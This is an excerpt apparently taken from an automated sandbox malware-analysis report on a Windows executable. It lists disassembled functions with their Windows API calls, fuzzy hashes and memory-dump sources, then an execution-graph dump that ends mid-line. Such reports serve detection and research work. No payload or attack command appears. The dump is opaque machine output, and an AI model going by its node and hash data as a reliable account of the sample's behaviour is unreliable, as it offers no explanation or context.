                                                                                                                                                  • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                  • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                  Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                  • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                  • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                  • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                  • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                  Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2883127279-0
                                                                                                                                                  • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                  • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                  • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                  • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                  Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                  • String ID: !N~
                                                                                                                                                  • API String ID: 623250636-529124213
                                                                                                                                                  • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                  • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                  • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                  • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                  Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                  Strings
                                                                                                                                                  • Error launching installer, xrefs: 00405C48
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                  • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                  • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                  • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                  • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                  Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                    • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                  • API String ID: 3509786178-2769509956
                                                                                                                                                  • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                  • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                  • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                  • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                  Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                  • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                  • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                  • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                  • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                  • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:3.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:96.3%
                                                                                                                                                  Signature Coverage:2.1%
                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                  Total number of Limit Nodes:86
                                                                                                                                                  execution_graph 114296 bc107d 114301 bd2fc5 114296->114301 114298 bc108c 114332 be2f70 114298->114332 114302 bd2fd5 __ftell_nolock 114301->114302 114335 bd1207 114302->114335 114306 bd3094 114347 be08c1 114306->114347 114313 bd1207 59 API calls 114314 bd30c5 114313->114314 114366 bd19e1 114314->114366 114316 bd30ce RegOpenKeyExW 114317 c101a3 RegQueryValueExW 114316->114317 114321 bd30f0 Mailbox 114316->114321 114318 c101c0 114317->114318 114319 c10235 RegCloseKey 114317->114319 114370 be0fe6 114318->114370 114319->114321 114331 c10247 _wcscat Mailbox __NMSG_WRITE 114319->114331 114321->114298 114322 c101d9 114380 bd433f 114322->114380 114325 bd1609 59 API calls 114325->114331 114326 c10201 114383 bd1821 114326->114383 114328 c1021b 114328->114319 114330 bd4c94 59 API calls 114330->114331 114331->114321 114331->114325 114331->114330 114392 bd1a36 114331->114392 114457 be2e74 114332->114457 114334 bc1096 114336 be0fe6 Mailbox 59 API calls 114335->114336 114337 bd1228 114336->114337 114338 be0fe6 Mailbox 59 API calls 114337->114338 114339 bd1236 114338->114339 114340 be00cf 114339->114340 114396 bf1b70 114340->114396 114343 bd1a36 59 API calls 114344 be0102 114343->114344 114398 be0284 114344->114398 114346 be010c Mailbox 114346->114306 114348 bf1b70 __ftell_nolock 114347->114348 114349 be08ce GetFullPathNameW 114348->114349 114350 be08f0 114349->114350 114351 bd1821 59 API calls 114350->114351 114352 bd309f 114351->114352 114353 bd1900 114352->114353 114354 c0f534 114353->114354 114355 bd1914 114353->114355 114425 bd1c7e 114354->114425 114420 bd18a5 114355->114420 114358 bd191f 114360 bd4c94 114358->114360 114359 c0f53f __NMSG_WRITE _memmove 114361 bd4ca2 114360->114361 114365 bd4cc4 _memmove 114360->114365 114363 be0fe6 Mailbox 59 API calls 114361->114363 114362 be0fe6 Mailbox 59 API calls 114364 bd30bc 114362->114364 114363->114365 114364->114313 114365->114362 114367 bd19fb 114366->114367 114369 bd19ee 114366->114369 114368 be0fe6 Mailbox 59 API calls 114367->114368 114368->114369 114369->114316 114372 be0fee 114370->114372 114373 be1008 114372->114373 114375 be100c std::exception::exception 114372->114375 114428 be593c 114372->114428 114445 be35d1 DecodePointer 114372->114445 114373->114322 114446 be87cb RaiseException 114375->114446 114377 be1036 114447 be8701 58 API calls _free 114377->114447 114379 be1048 114379->114322 114381 be0fe6 Mailbox 59 API calls 114380->114381 114382 bd4351 RegQueryValueExW 114381->114382 114382->114326 114382->114328 114384 bd182d __NMSG_WRITE 114383->114384 114385 bd189a 114383->114385 114387 bd1868 114384->114387 114388 bd1843 114384->114388 114386 bd1981 59 API calls 114385->114386 114391 bd184b _memmove 114386->114391 114390 bd1c7e 59 API calls 114387->114390 114456 bd1b7c 59 API calls Mailbox 114388->114456 114390->114391 114391->114328 114393 bd1a45 __NMSG_WRITE _memmove 114392->114393 114394 be0fe6 Mailbox 59 API calls 114393->114394 114395 bd1a83 114394->114395 114395->114331 114397 be00dc GetModuleFileNameW 114396->114397 114397->114343 114399 bf1b70 __ftell_nolock 114398->114399 114400 be0291 GetFullPathNameW 114399->114400 114401 be02cd 114400->114401 114402 be02b0 114400->114402 114403 bd19e1 59 API calls 114401->114403 114404 bd1821 59 API calls 114402->114404 114405 be02bc 114403->114405 114404->114405 114408 bd133d 114405->114408 114409 bd134b 114408->114409 114412 bd1981 114409->114412 114411 bd135b 114411->114346 114413 bd198f 114412->114413 114414 bd1998 _memmove 114412->114414 114413->114414 114416 bd1aa4 114413->114416 114414->114411 114417 bd1ab7 114416->114417 114419 bd1ab4 _memmove 114416->114419 114418 be0fe6 Mailbox 59 API calls 114417->114418 114418->114419 114419->114414 114421 bd18b4 __NMSG_WRITE 114420->114421 114422 bd1c7e 59 API calls 114421->114422 114423 bd18c5 _memmove 114421->114423 114424 c0f4f1 _memmove 114422->114424 114423->114358 114426 be0fe6 Mailbox 59 API calls 114425->114426 114427 bd1c88 114426->114427 114427->114359 114429 be59b7 114428->114429 114436 be5948 114428->114436 114454 be35d1 DecodePointer 114429->114454 114431 be59bd 114455 be8d58 58 API calls __getptd_noexit 114431->114455 114434 be597b HeapAlloc 114434->114436 114444 be59af 114434->114444 114436->114434 114437 be59a3 114436->114437 114441 be59a1 114436->114441 114442 be5953 114436->114442 114451 be35d1 DecodePointer 114436->114451 114452 be8d58 58 API calls __getptd_noexit 114437->114452 114453 be8d58 58 API calls __getptd_noexit 114441->114453 114442->114436 114448 bea39b 58 API calls 2 library calls 114442->114448 114449 bea3f8 58 API calls 7 library calls 114442->114449 114450 be32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 114442->114450 114444->114372 114445->114372 114446->114377 114447->114379 114448->114442 114449->114442 114451->114436 114452->114441 114453->114444 114454->114431 114455->114444 114456->114391 114458 be2e80 __setmbcp 114457->114458 114465 be3447 114458->114465 114464 be2ea7 __setmbcp 114464->114334 114482 be9e3b 114465->114482 114467 be2e89 114468 be2eb8 DecodePointer DecodePointer 114467->114468 114469 be2e95 114468->114469 114470 be2ee5 114468->114470 114479 be2eb2 114469->114479 114470->114469 114528 be89d4 59 API calls 2 library calls 114470->114528 114472 be2f48 EncodePointer EncodePointer 114472->114469 114473 be2ef7 114473->114472 114474 be2f1c 114473->114474 114529 be8a94 61 API calls 2 library calls 114473->114529 114474->114469 114477 be2f36 EncodePointer 114474->114477 114530 be8a94 61 API calls 2 library calls 114474->114530 114477->114472 114478 be2f30 114478->114469 114478->114477 114531 be3450 114479->114531 114483 be9e5f EnterCriticalSection 114482->114483 114484 be9e4c 114482->114484 114483->114467 114489 be9ec3 114484->114489 114486 be9e52 114486->114483 114513 be32e5 58 API calls 3 library calls 114486->114513 114490 be9ecf __setmbcp 114489->114490 114491 be9ed8 114490->114491 114492 be9ef0 114490->114492 114514 bea39b 58 API calls 2 library calls 114491->114514 114501 be9f11 __setmbcp 114492->114501 114517 be8a4d 58 API calls 2 library calls 114492->114517 114494 be9edd 114515 bea3f8 58 API calls 7 library calls 114494->114515 114497 be9f05 114499 be9f0c 114497->114499 114500 be9f1b 114497->114500 114498 be9ee4 114516 be32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 114498->114516 114518 be8d58 58 API calls __getptd_noexit 114499->114518 114502 be9e3b __lock 58 API calls 114500->114502 114501->114486 114505 be9f22 114502->114505 114507 be9f2f 114505->114507 114508 be9f47 114505->114508 114519 bea05b InitializeCriticalSectionAndSpinCount 114507->114519 114520 be2f85 114508->114520 114511 be9f3b 114526 be9f63 LeaveCriticalSection _doexit 114511->114526 114514->114494 114515->114498 114517->114497 114518->114501 114519->114511 114521 be2f8e HeapFree 114520->114521 114522 be2fb7 __dosmaperr 114520->114522 114521->114522 114523 be2fa3 114521->114523 114522->114511 114527 be8d58 58 API calls __getptd_noexit 114523->114527 114525 be2fa9 GetLastError 114525->114522 114526->114501 114527->114525 114528->114473 114529->114474 114530->114478 114534 be9fa5 LeaveCriticalSection 114531->114534 114533 be2eb7 114533->114464 114534->114533 114535 6cc23060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 114536 6cc230cd 114535->114536 114537 6cc235a0 114538 6cc235c4 InitializeCriticalSectionAndSpinCount getenv 114537->114538 114541 6cc238b2 114537->114541 114539 6cc238fc strcmp 114538->114539 114544 6cc235f3 114538->114544 114542 6cc23912 strcmp 114539->114542 114539->114544 114540 6cc235f8 QueryPerformanceFrequency 114540->114544 114542->114544 114543 6cc23622 _strnicmp 114543->114544 114545 6cc23944 _strnicmp 114543->114545 114544->114540 114544->114543 114544->114545 114547 6cc23664 GetSystemTimeAdjustment 114544->114547 114548 6cc2395d 114544->114548 114552 6cc2375c 114544->114552 114545->114544 114545->114548 114546 6cc2376a QueryPerformanceCounter EnterCriticalSection 114549 6cc237b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 114546->114549 114546->114552 114547->114544 114550 6cc236af __aulldiv 114547->114550 114551 6cc237fc LeaveCriticalSection 114549->114551 114549->114552 114550->114544 114551->114552 114553 6cc23846 __aulldiv 114551->114553 114552->114546 114552->114549 114552->114551 114552->114553 114553->114541 114554 bfdc5a 114555 be0fe6 Mailbox 59 API calls 114554->114555 114556 bfdc61 114555->114556 114557 bfdc7a _memmove 114556->114557 114558 be0fe6 Mailbox 59 API calls 114556->114558 114559 be0fe6 Mailbox 59 API calls 114557->114559 114558->114557 114560 bfdc9f 114559->114560 114561 6cc5b9c0 114562 6cc5b9ce dllmain_dispatch 114561->114562 114563 6cc5b9c9 114561->114563 114565 6cc5bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 114563->114565 114565->114562 114566 bc1055 114571 bc2a19 114566->114571 114569 be2f70 __cinit 67 API calls 114570 bc1064 114569->114570 114572 bd1207 59 API calls 114571->114572 114573 bc2a87 114572->114573 114578 bc1256 114573->114578 114576 bc2b24 114577 bc105a 114576->114577 114581 bc13f8 59 API calls 2 library calls 114576->114581 114577->114569 114582 bc1284 114578->114582 114581->114576 114583 bc1291 114582->114583 114584 bc1275 114582->114584 114583->114584 114585 bc1298 RegOpenKeyExW 114583->114585 114584->114576 114585->114584 114586 bc12b2 RegQueryValueExW 114585->114586 114587 bc12e8 RegCloseKey 114586->114587 114588 bc12d3 114586->114588 114587->114584 114588->114587 114589 bc5ff5 114612 bc5ede Mailbox _memmove 114589->114612 114590 be0fe6 59 API calls Mailbox 114590->114612 114591 bc6a9b 114867 bca9de 272 API calls 114591->114867 114594 bfeff9 114883 bc5190 59 API calls Mailbox 114594->114883 114596 bff007 114884 c2a48d 89 API calls 4 library calls 114596->114884 114598 bfefeb 114636 bc5569 Mailbox 114598->114636 114882 c16cf1 59 API calls Mailbox 114598->114882 114601 bc60e5 114602 bfe137 114601->114602 114613 bc63bd Mailbox 114601->114613 114614 bc6abc 114601->114614 114629 bc6152 Mailbox 114601->114629 114602->114613 114868 c17aad 59 API calls 114602->114868 114605 bd1a36 59 API calls 114605->114612 114606 be0fe6 Mailbox 59 API calls 114609 bc63d1 114606->114609 114611 bc63de 114609->114611 114609->114614 114615 bfe172 114611->114615 114616 bc6413 114611->114616 114612->114590 114612->114591 114612->114594 114612->114596 114612->114601 114612->114605 114612->114614 114612->114636 114733 bc53b0 114612->114733 114822 c3c355 114612->114822 114863 bc523c 114612->114863 114871 bd1c9c 114612->114871 114875 c27f11 59 API calls Mailbox 114612->114875 114876 c16cf1 59 API calls Mailbox 114612->114876 114613->114606 114620 bc6426 114613->114620 114881 c2a48d 89 API calls 4 library calls 114614->114881 114869 c3c87c 85 API calls 2 library calls 114615->114869 114616->114620 114624 bc5447 Mailbox 114616->114624 114870 c3c9c9 95 API calls Mailbox 114620->114870 114622 bfe19d 114622->114622 114623 be0fe6 59 API calls Mailbox 114623->114624 114624->114623 114626 bfe691 114624->114626 114630 bc69ff 114624->114630 114632 bc69fa 114624->114632 114635 bd1c9c 59 API calls 114624->114635 114624->114636 114637 bfea9a 114624->114637 114643 bd1207 59 API calls 114624->114643 114644 c17aad 59 API calls 114624->114644 114645 bfeb67 114624->114645 114646 be2f70 67 API calls __cinit 114624->114646 114648 bfef28 114624->114648 114650 bc5a1a 114624->114650 114656 bc7e50 114624->114656 114716 bc6e30 114624->114716 114625 bff165 114886 c2a48d 89 API calls 4 library calls 114625->114886 114878 c2a48d 89 API calls 4 library calls 114626->114878 114629->114598 114629->114614 114629->114636 114638 bfe2e9 #9 114629->114638 114761 c3ebba 114629->114761 114767 c3ec68 114629->114767 114775 bccfd7 114629->114775 114794 c3e60c 114629->114794 114797 c35e1d 114629->114797 114862 bc5190 59 API calls Mailbox 114629->114862 114877 c17aad 59 API calls 114629->114877 114630->114625 114630->114626 114640 bd1c9c 59 API calls 114632->114640 114634 bfe6a0 114635->114624 114642 bd1c9c 59 API calls 114637->114642 114638->114629 114640->114636 114642->114636 114643->114624 114644->114624 114645->114636 114879 c17aad 59 API calls 114645->114879 114646->114624 114880 c2a48d 89 API calls 4 library calls 114648->114880 114885 c2a48d 89 API calls 4 library calls 114650->114885 114657 bc7e79 114656->114657 114674 bc7ef2 114656->114674 114659 c00adf 114657->114659 114662 bc7e90 114657->114662 114668 c00b09 114657->114668 114658 c009e9 114661 c00ad3 114658->114661 114688 bc8022 